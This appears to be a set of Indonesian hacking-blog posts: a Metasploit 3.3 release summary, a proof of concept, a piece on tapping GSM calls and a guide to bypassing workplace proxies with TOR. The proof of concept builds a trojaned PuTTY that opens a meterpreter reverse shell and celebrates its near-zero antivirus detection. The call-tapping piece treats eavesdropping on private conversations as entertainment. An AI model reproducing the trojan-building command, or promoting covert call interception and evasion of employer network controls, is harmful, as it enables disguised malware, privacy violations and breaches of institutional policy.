.metasploit framework 3.3 released.

.sudah 363 hari sejak release notes metasploit 3.2 beredar,kerja keras dari dev-team ataupun kontribusi dari para freelance, menyebabkan perkembangan framework API berbasis ruby ini cukup pesat,ya spirit of the open source pr0ject-

.beberapa perubahan dalam release kali ini:
– 123 new exploits,117 auxiliary modules.
– dukungan terhadap ruby 1.9.1.
– performance dan stability lebih baik,peningkatan dalam proses startup framework.
– terintegrasi dengan OSVDB, exploit yang memiliki hubungan dengan OSVDB memiliki id referensi.
– compatiblitas terhadap OS 32-bit ataupun 64-bit baik unix,mac OS,windows.
– dukungan untuk JSP payloads, IPV6, NX dan DEP.
– meterpreter mendukung screenshot,keylogger, ataupun packet sniffing.
– msfencode dapat di embedded ke arbitry executables baik itu 32-bit ataupun 64-bit.
.for more info metasploit’s 3.3 release notes.

.masih ingat dengan artikel ini , meterpreter di encode XOR menggunakan shikata_ga_nai, dan lolos dari site virustotal.
.berikut POC dari msfencode embedded to arbitry executables.

view sourceprint?

01..d0tz@k-elektr0nik:/pentest/exploits/framework3$ ./msfconsole

02.

03. / / /

04.(___ (___ ___ ___ ( ___ ___

05.| )\ )| |___)|___ |___)| )|___)| )

06.|__/ \_/ |__ |__ __/ | \ | |__ |/\/

07. /

08.

09. =[ metasploit v3.4-dev [core:3.4 api:1.0]

10.+ -- --=[ 448 exploits - 216 auxiliary

11.+ -- --=[ 262 payloads - 22 encoders - 8 nops

12. =[ svn r7564 updated today (2009.11.18)

13.

14.msf > version

15.Framework: 3.4-dev.7554

16.Console : 3.4-dev.7537

--------------------------------------------

view sourceprint?

1..d0tz@k-elektr0nik:/pentest/exploits/framework3$ ./msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.13.37 LPORT=443 R | ./msfencode -t exe -x /home/d0tz/putty.exe -o /home/d0tz/puttyw00t.exe

2.[*] x86/shikata_ga_nai succeeded with size 102 (iteration=1)

.hasil scan virustotal 2/41.

.berikut merupakan hasil perbandingan metadata dari putty executable,

view sourceprint?

01..d0tz@k-elektr0nik:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/putty.exe

02.---- ExifTool ----

03.ExifTool Version Number : 7.89

04.---- System ----

05.File Name : putty.exe

06.Directory : /home/d0tz

07.File Size : 444 kB

08.File Modification Date/Time : 2009:11:08 22:36:28+07:00

09.---- File ----

10.File Type : Win32 EXE

11.MIME Type : application/octet-stream

12.---- EXE ----

13.Machine Type : Intel 386 or later, and compatibles

14.Time Stamp : 2007:04:29 18:43:12+07:00

15.PE Type : PE32

16.Linker Version : 7.10

17.Code Size : 323584

18.Initialized Data Size : 155648

19.Uninitialized Data Size : 0

20.Entry Point : 0x4777f

21.OS Version : 4.0

22.Image Version : 0.0

23.Subsystem Version : 4.0

24.Subsystem : Windows GUI

25.File Version Number : 0.60.0.0

26.Product Version Number : 0.60.0.0

27.File Flags Mask : 0x000b

28.File Flags : (none)

29.File OS : Win32

30.Object File Type : Executable application

31.File Subtype : 0

32.Language Code : English (British)

33.Character Set : Unicode

34.Company Name : Simon Tatham

35.Product Name : PuTTY suite

36.File Description : SSH, Telnet and Rlogin client

37.Internal Name : PuTTY

38.Original Filename : PuTTY

39.File Version : Release 0.60

40.Product Version : Release 0.60

41.Legal Copyright : Copyright © 1997-2007 Simon Tatham.

42.

43.------------------------------------------------------------------

44.

45..d0tz@k-elektr0nik:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/puttyw00t.exe

46.---- ExifTool ----

47.ExifTool Version Number : 7.89

48.---- System ----

49.File Name : puttyw00t.exe

50.Directory : /home/d0tz

51.File Size : 444 kB

52.File Modification Date/Time : 2009:11:18 10:46:17+07:00

53.---- File ----

54.File Type : Win32 EXE

55.MIME Type : application/octet-stream

56.---- EXE ----

57.Machine Type : Intel 386 or later, and compatibles

58.Time Stamp : 2007:04:29 18:43:12+07:00

59.PE Type : PE32

60.Linker Version : 7.10

61.Code Size : 323584

62.Initialized Data Size : 155648

63.Uninitialized Data Size : 0

64.Entry Point : 0x4c511

65.OS Version : 4.0

66.Image Version : 0.0

67.Subsystem Version : 4.0

68.Subsystem : Windows GUI

69.File Version Number : 0.60.0.0

70.Product Version Number : 0.60.0.0

71.File Flags Mask : 0x000b

72.File Flags : (none)

73.File OS : Win32

74.Object File Type : Executable application

75.File Subtype : 0

76.Language Code : English (British)

77.Character Set : Unicode

78.Company Name : Simon Tatham

79.Product Name : PuTTY suite

80.File Description : SSH, Telnet and Rlogin client

81.Internal Name : PuTTY

82.Original Filename : PuTTY

83.File Version : Release 0.60

84.Product Version : Release 0.60

85.Legal Copyright : Copyright © 1997-2007 Simon Tatham.

.ya bisa dilihat, hanya ada perbedaan pada entry point,are this s0 epic guys??

.walaupun berita terakhir announcement rapid7 dan hdmoore mail menyebutkan, metasploit telah di akusisi oleh rapid7 memang ada beberapa persepektif tentang ikut ambilnya rapid7 dalam project ini,positifnya dev-team akan lebih pr0fessional imbasnya metasploit lebih stabil, dan release sebuah exploit pun akan jauh lebih cepet. negatifnya mungkin beberapa fitur yang lebih advance akan dikenakan biaya oleh rapid7 like nessus maybe damn!… [that's just my opinion]

.kita liad saja konsekuensi dari para dev-team ataupun hd-moore apakah tetap menerapkan license 3-clause BSD atau akan mengikuti jejak immunity canvas maupun core-impact yang bersifat komersial.

.last w0rd, welcome metasploit 3.4 dev-

Debug, atau sadap?!

Ini adalah contoh alat untuk melakukan debugging/test pada perangkat telekomunikasi, hal yang sangat umum bagi mereka yang pernah bersentuhan dengan dunia telekomunikasi. Jika jaman dahulu engineer-engineer telkom (fixed telepon) bisa melakukan debugging sekaligus penyadapan melalui STO (Sentral Telepon Otomat) atau box-box yang ada di jalan-jalan, maka dengan teknologi selular seperti GSM salah satu proses debugging sederhana bisa melalui perangkat-perangkat core network (switching).

Cukup memilih timeslot yang diinginkan baik yang kosong ataupun yang telah terisi session tertentu (connection established), maka siapapun bisa mendengarkan percakapan antara 2 pihak. Ini adalah salah satu metode sederhana, dimana terdapat metode-metode lain yang bisa dihubungkan dengan suatu software untuk menyadap komunikasi via Operator secara legal.

Ah ya, jika kita beruntung, banyak yang melakukan pembicaraan ‘mesra’ pada malam hari, mungkin bisa menjadi jadi selingan tersendiri layaknya mendengar acara opera sabun di radio-radio sambil minum kopi. Kira-kira para petugas ‘Law Interception’ yang mengincar para koruptor ikut mendengarkan juga tidak ya…

Bypass Proxy / Proxy Tunnel-ing dengan TOR

Hufh, basi…tapi banyak juga yang belum tau. Singkatnya, design network di kantor atau sekolah atau institusi atau apapun umumnya memanfaatkan proxy untuk filtering penggunaan internet. Banyak yang tidak bisa IRC, tidak bisa YM, tidak bisa buka Friendster, tidak bisa buka situs porno (WTF??!don’t do this @work ;)), download dibatasi, de-el-el. Pertanyaan seputar bypass proxy dan tunneling sudah menjamur di internet, sampe muntah lihatnya jika ada yang masih bertanya “bagaimana caranya” tanpa membaca terlebih dahulu, kecuali pertanyaannya “saya coba bypass proxy pake webproxy tapi kok masih gagal ya, webproxy yang digunakan http://www.apa-aja.com/proxy”, masih mood lah untuk menjawabnya.

Hell, kebanyakan curhat :P. Ini ada sedikit tips untuk bypass proxy dengan menggunakan tor. Biasanya proxy di implementasikan dengan application proxy maupun transparent proxy. Bedanya, jika application proxy kita diharuskan memasukan informasi proxy secara manual setiap kali ingin browsing, misalnya dengan setting proxy di internet connection IE. Jika yang digunakan transparent proxy, maka user tidak perlu tahu alamat IP proxy namun cukup browsing dan nanti sisanya network yang akan mengarahkan pada proxy. Kedua jenis proxy ini bisa di-bypass dengan TOR.

Untuk kasus transparent proxy umumnya tidak butuh tambahan konfigurasi apapun, cukup download tor dan install serta jalankan tor-nya. Kemudian tinggal set proxy di browser sesuai dengan konfigurasi TOR (biasanya dibuka port 8118 oleh privoxy). Jika yang digunakan adalah application proxy, maka bisa tambahkan konfigurasi berikut ini pada file torrc:

ReachableDirAddresses *:80, *:443
ReachableORAddresses *:80, *:443
HttpProxy ip_proxy:port_proxy
HttpsProxy ip_proxy:port_proxy
KeepalivePeriod 30

Untuk IRC Client bisa menggunakan SOCKS Proxy dan langsung berhubungan dengan TOR, defaultnya di port 9050. Namun sayang sekali DALNET melakukan banyak AKILL pada network TOR, tapi untuk koneksi ke network lain tidak ada masalah, terutama private server.

FYI, jaringan IP internal Telkomsel maupun Indosat masih bisa di-bypass dengan TOR, dan mungkin perusahaan-perusahaan besar lainnya juga masih bisa, tergantung system adminnya juga :). TOR sendiri walaupun sudah sangat populer, namun tidak banyak sistem administrator yang memperhatikan mekanisme untuk blocking-nya. So, jangan heran jika banyak engineer yang doyan kerja malam sambil download besar-besaran dengan memanfaatkan bandwidth sebesar itu, akibatnya tagihan bandwidth perusahaan terbuang percuma.